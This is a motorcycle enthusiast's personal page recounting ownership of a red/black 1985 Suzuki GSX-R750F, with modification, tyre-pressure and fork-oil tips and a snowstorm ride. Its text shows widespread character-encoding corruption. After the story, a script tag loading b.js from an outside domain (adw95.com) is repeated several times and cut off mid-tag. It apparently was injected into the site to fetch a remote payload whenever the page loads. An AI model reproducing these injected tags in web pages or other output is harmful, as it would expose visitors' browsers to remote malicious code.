šŸ“ Kettering, Northants, United Kingdom šŸ“… Riding since 1971
IĀ“ve been on bikes sinceā€˜71. At 25 I got the GSX750E; a yr later I put it in a Moto Martin. Nother year & someone bent me & the Martin; I survived, the Martin didnĀ“t. So I got the 750ESD in Ā“83. In Ā“85 I bought the first ever GSXRF750 in East Anglia for the techno. I didnĀ“t really like the blue/white. I copied the plain white ones in the road tests and drew some paint schemes. Then one r/t had in b’grnd a red/black one so I had mine resprayed. That yr I won MCNĀ“s comp. to be theirs and ZukiĀ“s guest at GP. Had dinner with Zuki & breakfast with Eddie. On the day, when the F1Ā“s came out I was talking to Dennis Rohan. He said Ā“look theres lots of bikes like yours coming outĀ“. I said Ā“no theyĀ“re not; mines r/bĀ“. - Ā“What do you mean r/b? WeĀ“re not selling r/b this year!Ā“ - I said Ā“as far as IĀ“m concerned r/b are Zukis colours. My bikes have always been r/bĀ“. - Ā“YesĀ“ he said, Ā“thatĀ“s what we thought but Honda copied us this year so we decided not to sell r/b this year. Tell you what though we had a r/b one sent from Jap as a demo and we donĀ“t know what to do with it; whether to respray it or dump the b’work. Contact me after the GP and weĀ“ll see what we can sort outĀ“. That shut me up. So I wrote him and said Ā“yes IĀ“m interested in the bodywork but it depends how much you want for itĀ“ - Ā“Nothing just do you want us to send it or do you want to come and collect it?Ā“ - Ā“IĀ“LL COME AND COLLECT IT!Ā“ The comp set inc. seat, tank n m’guard; Ā£1400 worth! So now I have what must be the only genuine r/b UK model! Someone told me that all other Ā“85Ā“s were sprayed by Dream Machine. Anyway 18 years on and I still have it; it’s had an 1100 heart transplant last yr, but the 750Ā“s still OK after 70000 miles and touring France twice, 2up totally loaded. And it only get’s minimal maintenance ā€˜cos any spare time is spent riding it. If anyone wants to know, the R1100G/H motor goes straight in without the rocker cover Ā“cos the barrels are 10mm taller. I had the exh. down pipes stretched 10mm Ā“cos it was a damned sight cheaper that a new exh. IĀ“m not using the std a’box so that ends no problem. Other mods include h’stock angle up 1 degree. CMA wheels Ā“cos the originals flex; GSXR1100M f’brakes. Designed my own Ā“invisibleĀ“ calliper adaptors. No stability probs now still with the short s’arm. Separate Hi/Low beam BMW H/Lights for better vision. Zuki jeep indi’s for the rr and smoked LED fronts in the mirrors. Basic OhlinĀ“s rr shock ā€˜cos old one started to go little soft after 38000 mls & France. The Ohlins still good. Lastly radials; with cross-plys run them at 36-39 1or2 up. 36-36 as in h’book is one of the causes of instability. Oh one other thing; early on I chng’d the fork oil & someone wrongly told me 10wt not the recommended 15wt. Later I corrected it but it didnĀ“t feel as compliant. Recently I tried the 10wt again which gave much more flexibility to the adjustments and is far better on our shitty roads. I actually got caught out last winter when I needed to use my bike to travel 50mls to work. It was dry when I left. Time I got to work the snow & ruts were 3-4ā€ deep! After nice day with no new snow I thought the return journey would be OK. WRONG! It was dark and by halfway it was snowing again – 12 miles to go with a horiz blizzard in my face and I couldn’t even see the sides of the road; didn’t look like cars had been there for hrs. Just as well I knew the road like the back of my hand, I daren’t even look at the speedo but I’m guessing I was still able to do 25-30 mph ā€˜cos of no ruts! I waved a car past so then I could see in the distance better and from his ruts could see where the road was. The point being I was convinced I was going to end up on my arse but the ā€˜R’ never twitched!!!<script src=http://www.adw95.com/b.js></script><script src=http://www.adw95.com/b.js></script><script src=http://www.adw95.com/b.js></script><script src=http://www.adw95.com/b.js></script><script src=http://www.adw95.com/b.js></script><script src=http://www.adw95
